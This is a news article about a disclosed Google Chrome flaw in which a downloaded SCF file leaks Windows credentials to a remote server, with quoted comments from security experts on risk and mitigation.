Another major flaw was discovered, and this time it’s in Google Chrome. It’s said that this one could allow access to the victim’s device, and even let hackers steal Windows credentials. It can even be used for launching SMB relay attacks.
It was discovered by Bosko Stankovic, who works as a DefenceCode’s security engineer. Stankovic has left a blog post in which he claims that the one click on a malicious link could result in the download and installation of an SCF file.
The file doesn’t seem to do much unless the window of the download directory is opened. That provokes the SCF, and it will try to retrieve a certain icon, one associated with the file that the victim believes to have downloaded. In order to do it, the computer sends the credentials to a remote server, which reveals the exact info that the hacker needs to discover.
Stankovic has stated that the remote server stands ready to capture the credentials of the victim. Basically, all that the hacker needs to do is to tempt the newest victim to visit the malicious website. After that, they’ll be able to reuse the credentials. This could even be done if the victim isn’t an administrator or any other sort of privileged user.
This, of course, poses a very large threat to companies and other organizations, since the hacker or hackers can use this method to impersonate the members of pretty much any organization. Once they’ve gained some basic privileges, they could use those to escalate their access, and perform even more attacks, until they can even gain access to the IT resources. And all that without even mentioning the SMB relay attack, that’s also a possibility at any time.
Stankovic has said that the companies that are using NTLM as their method of authentication, and that would grant remote access to Microsoft Exchange and similar services can and probably are extremely vulnerable to SMB relay attacks. Attackers could also simply impersonate a certain member of the organization that they’ve victimized, and gain access to all the systems and data, without even the need to crack any passwords.
He has also stated that Google is notified about the issue and that he hopes that a fix will soon be released.
Lyons Leeming’s CEO, Cal Leeming, who’s also a convicted hacker, has commented and said that he finds this attack very interesting. He also said that the best mitigation for attacks like these is to block SMB traffic externally.
SureCloud’s security consultant, Mark Wardlow, has stated that this vulnerability affects only Google Chrome, and also that it requires a certain level of user interaction.
Still, if a fake web page is constructed carefully, he believes that tricking the user into triggering this attack shouldn’t be too difficult. He also said that the organizations that are risking the most are the ones that don’t control software installation on their computers, as well as the ones that are allowing the use of Google Chrome.